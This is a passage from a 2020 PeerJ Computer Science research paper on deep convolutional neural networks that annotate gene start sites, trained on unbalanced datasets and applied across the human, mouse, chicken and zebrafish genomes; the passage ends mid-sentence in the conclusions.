work_pz3pacjpbrf6hm67aqomk5ag6e ---- Submitted 15 October 2019 Accepted 18 May 2020 Published 15 June 2020 Corresponding authors Ghazaleh Khodabandelou, ghazaleh.khodabandelou@u-pec.fr, ghazaleh.khodabandeh@gmail.com Julien Mozziconacci, julien.mozziconacci@mnhn.fr Academic editor James Procter Additional Information and Declarations can be found on page 15 DOI 10.7717/peerj-cs.278 Copyright 2020 Khodabandelou et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Genome annotation across species using deep convolutional neural networks Ghazaleh Khodabandelou1,2, Etienne Routhier1 and Julien Mozziconacci1,3,4 1 Laboratoire de Physique Théorique de la Matière Condensée (LPTMC), Sorbonne Université, Paris, France 2 Laboratoire Images, Signaux et Systèmes Intelligents (LISSI), Université Val-de-Marne (Paris XII), Paris, France 3 CNRS UMR 7196 / INSERM U1154 - Sorbonne Université, Museum national d’Histoire naturelle (MNHN), Paris, France 4 Institut Universitaire de France, Paris, France ABSTRACT Application of deep neural network is a rapidly expanding field now reaching many disciplines including genomics. In particular, convolutional neural networks have been exploited for identifying the functional role of short genomic sequences. These approaches rely on gathering large sets of sequences with known functional role, extracting those sequences from whole-genome-annotations. These sets are then split into learning, test and validation sets in order to train the networks. While the obtained networks perform well on validation sets, they often perform poorly when applied on whole genomes in which the ratio of positive over negative examples can be very different than in the training set. We here address this issue by assessing the genome- wide performance of networks trained with sets exhibiting different ratios of positive to negative examples. As a case study, we use sequences encompassing gene starts from the RefGene database as positive examples and random genomic sequences as negative examples. We then demonstrate that models trained using data from one organism can be used to predict gene-start sites in a related species, when using training sets providing good genome-wide performance. This cross-species application of convolutional neural networks provides a new way to annotate any genome from existing high-quality annotations in a related reference species. It also provides a way to determine whether the sequence motifs recognised by chromatin-associated proteins in different species are conserved or not. Subjects Bioinformatics, Computational Biology, Data Mining and Machine Learning Keywords Transcription start sites, Promoters, Genome annotation, Deep learning, DNA motifs, Sequence evolution, Unbalanced datasets INTRODUCTION The improvement of DNA sequencing techniques lead to an explosion in the number and completeness of fully sequenced genomes. One of the major goals in the field is to annotate these DNA sequences, which is to associate a biological function with sequence motifs located at different positions along the genome (Stein, 2001). In the human genome for instance, while some DNA sequences encode proteins, most sequences do not code for any protein. Many of these non-coding sequences are nevertheless conserved in related species and are necessary for the correct regulation of gene expression. Deciphering the function of these non-coding sequences has been increasingly achieved through improvements in How to cite this article Khodabandelou G, Routhier E, Mozziconacci J. 2020. Genome annotation across species using deep convolu- tional neural networks. PeerJ Comput. Sci. 6:e278 http://doi.org/10.7717/peerj-cs.278 https://peerj.com/computer-science mailto:ghazaleh.khodabandelou@u-pec.fr mailto:ghazaleh.khodabandeh@gmail.com mailto:julien.mozziconacci@mnhn.fr https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.278 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://doi.org/10.7717/peerj-cs.278 the throughput of next generation sequencing (Rivera & Ren, 2013). The 3.2 Billion base pair (bp) long human genome is now annotated with many functional and bio-chemical cues (Kundaje et al., 2015; ENCODE Project Consortium et al., 2012), among which are the initiation sites of gene transcription (Carninci et al., 2006; Georgakilas, Perdikopanis & Hatzigeorgiou, 2020). While these annotations are becoming more numerous and precise, they cannot be determined experimentally for every organism and every cell type, as the experiments needed to produce these annotations are often costly and difficult to carry out. Computational methods are therefore widely used to extract sequence information from known annotations and extrapolate the results to different genomes or conditions, e.g., Kundaje et al. (2015) and Durham et al. (2018). An related question is to understand the link between these annotations and the un- derlying DNA sequence. To this end, supervised machine learning algorithms (Goodfellow, Bengio & Courville, 2016) have been particularly successful (Zou et al., 2019; Angermueller et al., 2016). Among those, deep Convolution Neural Networks (CNNs) are very efficient at detecting sequence features since they rely on the optimisation of convolution filters that can be directly matched to DNA motifs (Ching et al., 2018). Stacking several of these convolution layers together can lead to the detection of nested motifs at larger scales. Pioneering studies illustrated this ability of CNNs to reliably grasp complex combinations of DNA motifs and their relationship with functional regions of the genome (Min et al., 2016; Umarov & Solovyev, 2017; Alipanahi et al., 2015; Zhou & Troyanskaya, 2015; Kelley, Snoek & Rinn, 2016; Pachganov et al., 2019). Min et al. (2016) used a CNN to predict enhancers, which are specific sequences that regulate gene expression at a distance. This method performed very well and ranked above state-of-the-art support vector machine based methods. Similar tools were used in different contexts, aiming at identifying promoters (Umarov & Solovyev, 2017; Pachganov et al., 2019) or detecting splice sites (Leung et al., 2014; Jaganathan et al., 2019). In these approaches, a sample set is first created by taking all positive class sequences (e.g., enhancers) and adding the same amount of randomly picked negative class examples (e.g., non- enhancers). This sample set is then divided into training, validation and test sets. Balancing the data ensures that the model will be trained on the same number of positive and negative examples, thus giving the same importance to both classes. While these approaches are very successful when assessed on test sets derived from the sample set, we show here that they tend to perform poorly when applied on entire chromosome sequences as required for the task of complete genome annotation. This is due to the fact that the networks are optimised on a similar number of positive and negative examples during training, but that they will usually face very different ratios of negative over positive classes when used on a full chromosome sequence (He & Garcia, 2009). Alternative approaches (Alipanahi et al., 2015; Kelley, Snoek & Rinn, 2016) used unbalanced datasets for training (i.e., with more negative than positive examples) to predict DNA-binding sites for proteins and genome accessibility. In these two studies, however, the prediction performance of the model is also assessed on test sets derived from training sets, not on full genomic sequences. The task of genome-wide prediction has been assessed in a more recent study aiming at identifying cell type specific regulatory Khodabandelou et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.278 2/18 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.278 elements (Kelley et al., 2018). In order to infer long range relationships between these elements, Kelley et al. used very long (131 kb) non-overlapping windows covering the whole genome. This approach has proven efficient but requires a lot of computational memory. As our goal is to provide genome-wide predictions, the methodology we used is inspired from this last study. Since we do not aim here at predicting cell type specific features, we could use shorter sequences as input and a simpler network architecture. We also present two novelties for the development and for performance assessment of genome-wide predictions. Firstly, we do not use as a quality measure the classical prediction scores computed on test sets obtained by dividing the sample data into training, validation and test sets as commonly done in machine learning. Rather, we compute prediction scores that assess the ability of our model to annotate a full chromosome sequence by designing a specific metric (described in Material and Methods). Secondly, we change the ratio between positive and negative examples in order to obtain the highest prediction scores and show that this tuning is has an important effect on the outcome. As a proof of principle, we use in this work gene start sites (GSS) as features. DNA motifs around GSS are recognised by the transcription machinery and indicate the location of the initiation of transcription (Kugel & Goodrich, 2017). The DNA sequence surrounding GSS therefore contains the information that could in principle be used by an algorithm to identify in silico the GSS locations. These DNA sequence motifs are different for different classes to genes. For instance, protein coding genes can have either CG di-nucleotide (CpG) rich or poor sequences upstream their GSS (Deaton & Bird, 2011). We show that using training sets with a higher ratio of negative over positive examples, we can faithfully retrieve GSS positions, with performances varying for different classes of genes such as coding or non coding genes. We then propose a new application of CNNs in genomics that leverages the fact that similar organisms tend to have similar regulatory mechanisms, i.e., rely on homologous molecular machinery and on homologous DNA regulatory motifs. Exploiting these homologies, we first train a model on a dataset corresponding to a given organism and use it to predict the annotation on the genome of a related organism, opening new opportunities for the task of de-novo genome annotation. We show that a CNN trained on GSS containing regions in human is able to recover regions containing GSS in the mouse genome and vice versa. We also assess the generalisation of the approach to more distant species, taking as examples Gallus gallus and Danio rerio. METHODS Input generation Genomic sequences were downloaded for the reference genomes for Human (hg38), Mouse (mm10), Chicken (gg4) and Zebrafish (dr10) via the URLs shown in Table 1. Similarly, GSS positions for each genome were extracted from their respective NCBI RefSeq Reference Gene annotations (RefGene). As a positive input class, we use regions of 299 bp flanking GSS (i.e., ±149 bp around the GSS) which are supposed to contain multiple sequence signals indicating the presence Khodabandelou et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.278 3/18 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.278 Table 1 URL of the data used in the present work. Genomes human https://hgdownload.soe.ucsc.edu/goldenPath/hg38/bigZips/hg38.fa.gz mouse https://hgdownload.soe.ucsc.edu/goldenPath/mm10/bigZips/chromFa.tar.gz chicken https://hgdownload.soe.ucsc.edu/goldenPath/galGal4/bigZips/galGal4.fa.gz zebrafish https://egg.wustl.edu/d/danRer10/refGene.gz Reference Gene human https://egg.wustl.edu/d/hg38/refGene.gz mouse https://egg.wustl.edu/d/mm10/refGene.gz chicken https://egg.wustl.edu/d/galGal4/refGene.gz zebrafish https://egg.wustl.edu/d/danRer10/refGene.gz of a GSS to the transcription machinery of the cell. For instance in the human genome, 31,037 GSS positions are extracted on both DNA strands (15,798 for the positive strand and 15,239 for the negative strand). In order to generate the negative class, we select 31,037 ×Q sequences of 299 bp at random positions on a random strand, rejecting regions that do contain a GSS. The odds of getting at random a genomic region containing a GSS are close to 0.28%. For Q=1, there is an equal number of negative and positive class examples. Unbalanced datasets are produced using different values of Q ranging from 1 to 100. For Q=100, the negative class encompasses 100×299×31k≈1Gb, which represents one third of the human genome. For the other genomes a similar procedure was implemented. The total number of GSS used was 25,698 for the mouse, 6876 for the chicken and 14805 for the zebrafish. Convolution Neural Network (CNN) A CNN (see Fig. 1) is trained in order to predict the presence of a GSS in a DNA sequence of size 299 bp. The shape of the input layer is c×b in which c =4 is the number of different nucleotides and b=299 is the length of the input sequence. The nucleotide sequences are one hot encoded so that A=(1,0,0,0), T=(0,1,0,0), C=(0,0,1,0), and G=(0,0,0,1). The training set contains N samples of labelled pairs (X(n),y(n)), for n∈{1,...,N}, where X(n) are matrices of size c×b and y(n) ∈{0,1}. Each X(n) is associated with y(n) =1 when it corresponds to a region containing a GSS and y(n) =0 otherwise. The first convolution layer consists of k kernels of length s which are applied on b−s+1 successive sequences at positions p∈{1,...,(b−s+1)} to recognise relevant DNA motifs of size s. This operation generates an output feature map of size k×(b−s+1) for an input X(n) of size c×b. The feature map M resulting from the convolution operation is computed as follows: Mp,i= c∑ j=1 s∑ r=1 Wi,j,rXp+r−1,j+Bi, i∈{1,...,k} (1) where W denotes the network weights with size (k×c×s) and B denotes the biases with size (k×1) (see e.g., Goodfellow, Bengio & Courville, 2016). After the convolution layer a non-linear function is applied to the output, here a Rectified Linear Unit (ReLU). This Khodabandelou et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.278 4/18 https://peerj.com https://hgdownload.soe.ucsc.edu/goldenPath/hg38/bigZips/hg38.fa.gz https://hgdownload.soe.ucsc.edu/goldenPath/mm10/bigZips/chromFa.tar.gz https://hgdownload.soe.ucsc.edu/goldenPath/galGal4/bigZips/galGal4.fa.gz https://egg.wustl.edu/d/danRer10/refGene.gz https://egg.wustl.edu/d/hg38/refGene.gz https://egg.wustl.edu/d/mm10/refGene.gz https://egg.wustl.edu/d/galGal4/refGene.gz https://egg.wustl.edu/d/danRer10/refGene.gz http://dx.doi.org/10.7717/peerj-cs.278 Figure 1 Overview of the CNN model. A total of 299 bp-long sequences were one hot encoded into a 4×299 input matrix. The first CNN layer performs a convolution on each input matrix to recognise rel- evant motifs. The next convolutional layers models the interplay among these motifs to grasp higher-level features. Max-pooling layers reduce the dimensions of the layers. The model is trained to correctly label input sequences as GSS or non-GSS. The output layer of the trained network then gives a probability for any 299 bp region to contain a GSS. It can be applied along a full chromosome, i.e., on all 299 bp-long se- quences with a 1 bp shift. Full-size DOI: 10.7717/peerjcs.278/fig-1 activation function computes fReLU (M)=max(0,M) to incorporate non-linearity by transforming all negative values to zero. In order to reduce the input dimension we apply a max-pooling process with a pool size m over the output of fReLU (M). Similar convolution layers followed by ReLu and max-pooling are added sequentially on the input of the first layer to grasp higher order motifs. The output of the last max-pooling layer is then fed into a fully connected layer which output x is transformed by a softmax layer, i.e., a sigmoid function (φ= 11+e−x ), in order to give the final output of the CNN. This final score of the input sequence is ideally 0 for non-GSS and 1 for GSS containing sequences. When we need to perform a classification we use a threshold of 0.5 to discriminate between the two classes. In the training phase, the weights and biases of the convolution layers and the fully connected layer are updated via back-propagation (Rumelhart, Hinton & Williams, 1986) in a way which decreases the loss, which measures the discrepancy between the network predictions and the reality averaged over individual examples. We use here the binary cross-entropy computed as: L=−1/N N∑ i=1 [y(n)log(ŷ(n))+(1−y(n))×log(1− ŷ(n))] (2) where ŷ(n) is the estimated score for the input sample X(n). As data are imbalanced for Q>1, the model may reach a local optimum when predicting the non-GSS class for all input sequences. In order to deal with this issue, we attribute different weights to the positive and negative classes. We assign a greater importance to the less represented GSS class by multiplying the associated term in the loss by a weight CW = number of non-GSSnumber of GSS =Q. Khodabandelou et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.278 5/18 https://peerj.com https://doi.org/10.7717/peerjcs.278/fig-1 http://dx.doi.org/10.7717/peerj-cs.278 One of the important issues of any learning algorithm is overfitting. Overfitting occurs when one achieves a good fit of the model on the training and validation data, while it does not generalise well on new, unseen data. To deal with this issue, a regularisation procedure called dropout is usually used (Srivastava et al., 2014). In the training step, some outputs of the pooling layers are randomly masked while the remaining information is fed as inputs for the next layer. Implementation We implement CNN using Keras library (Chollet et al., 2015) and Tensorflow (Abadi, Agarwal & Barham, 2015) as back-end. Training on a GPU is typically faster than on a CPU. We use here a GTX 1070 Ti GPU. We use Adaptive Moment Estimation (Adam) to compute adaptive learning rates for each parameter (Kingma & Ba, 2014). Adam optimiser is an algorithm for first-order stochastic gradient-based optimisation of functions, based on adaptive estimates of lower-order moments. The network architecture (see Fig. 1) is detailed in Table 2. The models are trained for 150 epochs and they mostly converge rapidly (around 30–35 epochs, we use early stopping to prevent overfitting). Hyper-parameters tuning is detailed in the supplementary materials. Source codes are available at https://github.com/StudyTSS/DeepTSS/. Genome wide performance measure Different measures have been developed in order to assess the performance of different models on conventional test sets, i.e., test sets derived from a subset of the initial data. Such measures are described in details in the corresponding supplementary materials section. In our case, we want to apply our model on all the 299 bp windows spanning a full chromosome and eventually chromosomes from other species. Specifically, the model was tested on chromosome 21 which was withdrawn from the training set. We therefore developed a measure to evaluate the performance of the trained models in this case. This metric, calledλ, measures the enhancement of the predicted signal specifically in the regions surrounding the known GSS. We use in the present papers regions of length r = 400 bp. To compute λ, we first compute the genome-wide Z-score (Kreyszig, 2009) Zg = yg−µ̄ σ from the predictions yg where g denotes positions on the genome, and µ̄ and σ stand for the prediction mean and standard deviation, respectively. We extract ZGSS, the Zg signal over 10 kb windows centred on each GSS of the test region, e.g., a full chromosome. Zg is a 2D-array whose rows correspond to different genes and columns to different distances to the GSS. We then average element-wise ZGSS over all GSS, i.e., along all rows. This gives us S, the average of the Z-transformed prediction score in a 10 kb window around all GSS. In order to measure the signal increase close to the GSS, that we call λ, we compute the average of the curve S on a region of r bp centred on the GSS. A higher value of λ corresponds to a higher signal-to-noise ratio around the GSS. Khodabandelou et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.278 6/18 https://peerj.com https://github.com/StudyTSS/DeepTSS/ http://dx.doi.org/10.7717/peerj-cs.278 Table 2 Network architecture of the CNN model. The first column depicts the different layers used con- secutively in the network. The ’’layer shape’’ column reports the shape of the convolutional kernels, the max-pooling windows and the fully connected layers. The ’’output shape’’ column reports the variation of layer shapes at each step. Layer name Layer shape Output shape Input – 4×299×1 Conv2D 32×4×(4×1) 32×296×1 Max-pooling 2×1 32×148×1 Dropout – 32×148×1 Conv2D 64×32×(4×1) 64×145×1 Max-pooling 2×1 64×72×1 Dropout – 64×72×1 Conv2D 128×64×(4×1) 128×69×1 Max-pooling 2×1 128×34×1 Dropout – 128×34×1 Dense 128 128 Dropout – 128 Dense (sigmoid) 1 1 RESULTS Training models for genome annotation of GSS The problem of detecting human GSS using deep neural networks has been tackled in (Umarov & Solovyev, 2017). We first follow a similar approach and use a balanced dataset (see Methods for details). The model is trained/validated on an equal number of 299 bp long positive and negative examples and is evaluated on a test set composed of 15% of the original data that was left aside prior to training. The specificity (Sp), the sensitivity (Sn) and the Matthews Correlation Coefficient (MCC, Chicco & Jurman, 2020) (see Supplemental Information 1 for definition) were found to be similar to the ones found in (Umarov & Solovyev, 2017) which used a similar approach albeit separating the sample data into TATA-containing GSS and non-TATA GSS (Sp = 0.94, Sn = 0.92 and MCC = 0.86). In order to assess how this model would perform as a practical tool for detecting GSS on a genome-wide scale, we apply it on all the sequences along chromosome 21 (which has been withdrawn from the training phase, i.e., from the training and validation sets) obtained using a 299 bp long window sliding with an offset of 1 bp. Figure 2A illustrates the predictions of the CNN model over a typical region of 300 kbp containing 7 out of the 480 GSS of chromosome 21. Although the predictions yield higher scores over GSS positions, they also yield high scores over many non-GSS positions reflecting a low signal-to-noise ratio. This is due to the fact that the reality is biased in the training phase during which the CNN model learns an equal number of examples from the positive and the negative classes (He & Garcia, 2009). Applied over all the 299-bp sequences of chromosome 21, the model encounters many more examples of the negative class and fails to generalise to the new examples. Khodabandelou et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.278 7/18 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.278#supp-1 http://dx.doi.org/10.7717/peerj-cs.278#supp-1 http://dx.doi.org/10.7717/peerj-cs.278 Figure 2 CNN predictions for two regions of chromosome 21. (A) Prediction scores for balanced 1* model (Q = 1) and unbalanced 100* model (Q = 100), respectively in blue and red on a 300 kb region. The position of genes is indicated below. The annotation track was done using the UWash Epigenome browser (https://epigenomegateway.wustl.edu/). Both models detect 7 GSS positions, but the 1* model re- turns a higher background signal at non GSS positions. Adding negative examples using the 100* model mitigates the noise while preserving the high scores over GSS. (B) Application of 30 1* models, trained on different datasets, over a 3.2 kb region of chromosome 21. At each site, the maximum and minimum pre- diction scores are respectively displayed in black and red. Other prediction scores are plotted in grey. Full-size DOI: 10.7717/peerjcs.278/fig-2 To address this issue and train a network for genome annotation, we propose a heuristic where more negative examples are added into the balanced dataset to reduce the importance of the positive class during training and to allocate more weight to the negative class. We call these augmented datasets limited unbalanced datasets. The parameter Q is the ratio between negative and positive training examples and denote as Q∗ models trained with the corresponding ratio. For instance, on Fig. 2A the model trained on the balanced data yielding to blue signal predictions is denoted as 1∗. We train our CNN model on a 100* dataset (Q=100) and assess the efficiency of the trained model. As depicted on Fig. 2A by a red signal, the predictions for this model display a much higher signal-to-noise ratio, with significant peaks over each of the 7 GSS (C21orf54, IFNAR2, IL10RB, IFNAR1, IFNGR2, TMEM50B, DNAJC28) and a much weaker signal between these sites. Predicting GSS using the 100* model is thus expected to generate fewer false positives than the 1* model, regardless the value of the threshold used to identify GSS-containing regions. In order to Khodabandelou et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.278 8/18 https://peerj.com https://epigenomegateway.wustl.edu/ https://doi.org/10.7717/peerjcs.278/fig-2 http://dx.doi.org/10.7717/peerj-cs.278 assess how changing the value of Q affects GSS classification, we apply a threshold on the prediction and compute the precision and the recall obtained for both models (i.e., 1* and 100*) at 600 bp resolution on a full chromosome. The precision recall curves confirmed the compromising effect of a lower signal-to-noise ratio on the accuracy of the classification (Fig. S1). For the sake of completeness, the performance of more models (1*, 10*, 20*, 30*, 50*, 100*) evaluated using conventional metrics on test sets derived from the initial sample sets can be found in Supplemental Information 1. Investigating the effect of random selection of the negative examples on predictions While positive examples are always the same in different sample sets, the negative examples are randomly picked out of the genome. The performance of the model in different regions of chromosome 21 can thus vary for different training sets (Wesolowska-Andersen et al., 2020). To investigate this variation, we set up 30 balanced 1∗ datasets and train 30 CNNs separately. The 30 models are then applied over human chromosome 21 to study the fluctuations of the predictions. The variation of 30 predictions is depicted in Fig. 2B. The first observation is that almost all predictions present a peak over the DIP2A GSS. However, the large gap between the minimum and maximum predictions underlines the variability of predictions obtained with different training datasets. This variability illustrates the uncertainty of the predictions obtained from a single CNN trained on a balanced dataset and highlights the need to use limited unbalanced datasets for the task of genome annotation. Comparing 1* and 100* models over a full chromosome Models trained on 1* and 100* sets are applied to the full chromosome 21 and the Z-normalized prediction scores around GSS are presented as heat-maps. While the 1* model (Fig. 3A) presents a noisy signal around GSS positions, the 100* model (Fig. 3B) presents a higher signal-to-noise ratio. To investigate the performance of different models on a genome-wide scale we devised a custom metric λ which measures the average signal-to-noise ratio around GSS (see Methods for the definition of λ). Figures 3C, 3D illustrate the average of the Z-score over all the GSS of chromosome 21 for the models 1* and 100*, respectively, and λ denotes the average of this average over a r =400 bp region centred on the GSS. A larger λ score corresponds to a higher signal-to-noise ratio. In this particular case, we find a λ score of 2.21 and 5.81 for the 1* and 100* model, respectively. To illustrate the variability of prediction scores achieved around different GSS, we randomly selected four GSS within the chromosome. The first GSS corresponds to the gene CXADR, shown in Fig. 3E. While the prediction of 1* model results in a low averaged Z-scores over all positions, the averaged Z-score of 100* model strongly peaks around the GSS position and shows low variations over non-GSS positions. Figure 3F depicts the second selected GSS corresponding to the KRTAP19-2 gene. This gene is part of a cluster of similar genes belonging to the family of Keratin Associated Proteins (highlighted by a yellow rectangle on Figs. 3A, 3B). For this particular cluster, the predictions are poor for Khodabandelou et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.278 9/18 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.278#supp-1 http://dx.doi.org/10.7717/peerj-cs.278#supp-1 http://dx.doi.org/10.7717/peerj-cs.278 Figure 3 Comparison of the 1* and 100* models predictions over chromosome 21. (A) and (B) Heat maps depict the Z-score of the prediction for the 1* and 100* models respectively on 5,000 bp flanking each GSS of chromosome 21. (C) and (D) Averaged Z-score of the predictions over each GSS of chromo- some 21. (E–H) Zoom on regions around randomly selected GSS. Genes are indicated at the bottom of each plot. (I–K) Averaged Z-score of the predictions over each GSS of mouse chromosome X (I) and for networks trained on mouse/human chromosomes (except X) and applied on human/mouse chromosome X (J,K). Full-size DOI: 10.7717/peerjcs.278/fig-3 both 1* and 100*, probably reflecting a specific GSS signature that has not been grasped by the model. Another example of gene cluster with a poor prediction score for GSS is the t-RNA cluster, highlighted in green in Figs. 3A, 3B. Figures 3G, 3H displays the predictions around the GSS of the SCAF4 and, PCNT and C21ORF58 genes, respectively. On these more typical GSS the 100* model shows a higher signal-to-noise ratio than the 1* and regions containing GSS are detected. These regions often stretch over 1 kb while our training sequence centred on each GSS is only 299 bp long. This could indicate the presence either of alternative GSS close to the annotated GSS or of similar sequence patterns in broader regions surrounding the GSS (Carninci et al., 2006; Sandelin et al., 2007). Learning and predicting in human and mouse To show the potential of our annotation method in a different context, we replicate a similar GSS analysis in mouse. Models with values of Q ranging from 1 to 100 trained on mouse chromosomes (except X) are applied over the mouse chromosome X to assess the model performance (see Fig. 3I, and Figs. S2A, S2D, S2G). The averaged Z-score of λ reaches values of 2.24 and 4.90 respectively for the 1* and 100* models in quantitative agreement with the model performance in human. Khodabandelou et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.278 10/18 https://peerj.com https://doi.org/10.7717/peerjcs.278/fig-3 http://dx.doi.org/10.7717/peerj-cs.278#supp-1 http://dx.doi.org/10.7717/peerj-cs.278#supp-1 http://dx.doi.org/10.7717/peerj-cs.278#supp-1 http://dx.doi.org/10.7717/peerj-cs.278 Mammals show a substantial degree of homology in the DNA sequence found at GSS (Waterston et al., 2002), and earlier computational models were trained to recognise transcription start site in any mammalian species (Down & Hubbard, 2002). This study focused on 313 sequences, of which 50 were kept aside for test purposes and we want here to extend the validity of this initial study at the genome wide level. Following this line, we determine the possibility of predicting GSS in one organism with a network trained on a related organisms. This possibility has previously been shown to be effective for sequence variants calling (Poplin et al., 2018) To this end, the mouse trained model is applied on human chromosome X and the human trained model is applied on mouse chromosome X. The two chromosomes carry homologous genes (Waterston et al., 2002), the number of annotated GSS varies with a total of 4,968 GSS in human and 2,005 GSS in mouse. While the model trained and applied on mouse shows a better signal-to-noise ratio, the same model applied to human chromosome X still captures most of the GSS and gives a λ score of 5.18 for the 100* model (see Fig. 3J and Figs. S2B, S2E, S2H). Similarly, the models trained on human capture most of GSS on the mouse X chromosome as shown in Fig. 3K and Figs. S2C, S2F, S2I and reaches a λ score of 4.32 for the 100* model. In all cases, the signal-to-noise ratio is improved in the 100* models with respect to the 1* models. The human model applied on human provides the highest scores for both 1* and 100* models probably a signature of an overall better GSS annotation. Evaluation of the prediction for different GSS classes The potential of our trained networks to recover GSS containing regions along the human and mouse genomes is assessed in the previous parts without any distinction between different GSS classes. Since we find that some GSS are better predicted than others (Fig. 3), we compute the λ score independently for the two main classes of GSS: mRNA-GSS and ncRNA-GSS. While λ is higher for the mRNA-GSS class, the model is versatile and is also able to predict the ncRNA-GSS (Fig. 4B). In human and mouse, mRNA-GSS are found in different classes, that can be derived from the CpG content of the region flanking the GSS. High CpG regions, also called ‘‘CpG island’’ can be methylated and play an important role in gene regulation (Deaton & Bird, 2011). Figure 4A displays the distribution of the CpG number in 299 bp regions surrounding the all mRNA-GSS for the mouse and human X chromosome. From this distribution, we identify three classes of mRNA-GSS with respectively a high, medium and low CpG content. High CpG GSS correspond to genes regulated by DNA methylation and have been shown to exhibit a different pattern of chromatin modifications (Vavouri & Lehner, 2012). Assessing the performance of the model for the three different classes, we find that better scores are obtained for CpG richer GSS (Fig. 4B). The worst performing GSS are low CpG content GSS which are hardly recovered by our model. In order to test whether CpG content alone could be used to predict GSS we computed the λ score over all GSS using the Z-normalized CpG content as predictor. We get values of 1.30 and 0.92 respectively for the human and mouse GSS indicating that the CpG content is a strong indicator of the present of GSS but that our models use as well other features which allow them to reach much higher scores. Khodabandelou et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.278 11/18 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.278#supp-1 http://dx.doi.org/10.7717/peerj-cs.278#supp-1 http://dx.doi.org/10.7717/peerj-cs.278#supp-1 http://dx.doi.org/10.7717/peerj-cs.278#supp-1 http://dx.doi.org/10.7717/peerj-cs.278#supp-1 http://dx.doi.org/10.7717/peerj-cs.278#supp-1 http://dx.doi.org/10.7717/peerj-cs.278 Figure 4 Evaluation of the model performance for different classes of genes. (A) and (B) CpG number in 299 bp regions centred on mRNA-GSS in X chromosomes for human (A) and mouse (B). These regions were divided in three groups of similar size according to their CpG number into low, medium and high groups (the bounds are 35% and 60% for human and 30% and 60% for mouse). The proportion of genes in each class is similar on the X chromosome (test set) than on other chromosomes (training and valida- tion sets). (C) Lambda values computed for networks trained on each species non-X chromosome GSS (t) and predicted on either species’ X-chromosome GSS (p). Lambda values for each mRNA-CpG sub-group and ncRNA genes are also shown to highlight different levels of performance. Full-size DOI: 10.7717/peerjcs.278/fig-4 Application of the approach to other vertebrates The performance of a CNN trained on human GSS to recover mouse GSS is not surprising given the similarity between their genomes (Waterston et al., 2002). We next set out to apply the same methodology on more diverse species, including chicken and zebrafish (Fig. 5). Four CNNs were trained on all the GSS from the genomes of Homo Sapiens (human), Mouse musculus (mouse), Gallus gallus (chicken) and Danio rerio (zebrafish). G.g. and D.r. are model organisms, and together with H.s. and M.m. provide the most comprehensive GSS annotations for mammals, birds and fishes. These four CNNs were Khodabandelou et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.278 12/18 https://peerj.com https://doi.org/10.7717/peerjcs.278/fig-4 http://dx.doi.org/10.7717/peerj-cs.278 Figure 5 Lambda scores obtained with CNN trained on four different species: human, mouse, chicken and zebrafish. Lambda scores are computed from predictions done on GSS of (A) human, (B) mouse, (C) chicken and (D) zebrafish chromosomes. Full-size DOI: 10.7717/peerjcs.278/fig-5 then applied genome wide on each of the four species and the λ metric is computed for each chromosome independently, using a r value of 400 bp (see Methods). The results for the human and mouse genomes are very similar, with only a slightly better performance when the model trained on a species is applied on the same species. The model trained on the chicken genome performs less well when applied on the mammalian genomes and the model trained on the zebrafish genome is not able recover the mammalian GSS as shown by a λ value of 0. When applied on the chicken genome, the mouse and human models surprisingly outperform the chicken model, probably because the GSS annotation is better in the two mammals so that the training phase is more efficient. This result highlights the potential of the method when used across different species when the genome of one species is more precisely annotated. When applied on the zebrafish genome on the other hand, the human, mouse and chicken models all show poor performances while the zebrafish model performs well. This is in line with the fact that the CpG composition of zebrafish regions around GSS if very different than in chicken and mammals. CpG islands, which are high density CpG regions, are found upstream of many GSS for coding genes in chicken and mammals while they are less abundant in the zebrafish’s genome which has a low GC content (Han et al., 2008). All together, these results suggest that the molecular machinery that interprets the genome sequence in order to find start sites of genes has a similar specificity in human, mouse and chicken, but a different specificity in zebrafish. CONCLUSIONS With the surge of DNA sequencing technologies, over a million genome datasets are now available and petabases of transcripts are sequenced every year to annotate these datasets with functional marks (Wainberg et al., 2018). It has not escaped the notice of many computational biologists that deep neural networks are a key tool to deal with this exponentially increasing amount of data (Wainberg et al., 2018). One possible application is to leverage datasets with good annotations in order to train neural networks and to predict annotations on other datasets. One of the practical issues when applying neural networks Khodabandelou et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.278 13/18 https://peerj.com https://doi.org/10.7717/peerjcs.278/fig-5 http://dx.doi.org/10.7717/peerj-cs.278 on genomic sequences is unbalanced data, a well-known issue in the machine learning literature (He & Garcia, 2009; Chawla, Japkowicz & Kotcz, 2004; Batista, Prati & Monard, 2004). In the present paper, we address this problem using GSS as a case study. Indeed, GSS occupy only a few locations on the genome (31,037 GSS for human) leading to extreme unbalances in datasets (i.e., the ratio of GSS-containing 299 bp windows to non-GSS in the human genome is 1/400). In this case, the lack of examples of the minority class (i.e., true GSS) impacts the learning process as conventional machine learning algorithms usually measure the model performance on the majority class (i.e., non-GSS) leading to biased or inaccurate prediction of the minority class. To deal with this disparity, we adopt a weighting strategy to decrease the importance of the majority class samples (non-GSS) during the learning process thereby improving identification of the rare minority class samples (GSS). Using this approach, which we call ‘‘limited unbalanced datasets’’, we show that learning on imbalanced datasets can be performed effectively, and that for GSS recognition, a ratio of 1 to 100 positive over negative examples is usually sufficient to achieve a good signal to noise ratio in the prediction. This approach can be easily extended to identify other functional regions in any annotated genome. We also show that our method can be efficiently used across genomes of different species, i.e., training the model on one genome and applying it to another genome. We use the X chromosomes of human and mouse GSS as a case study, and 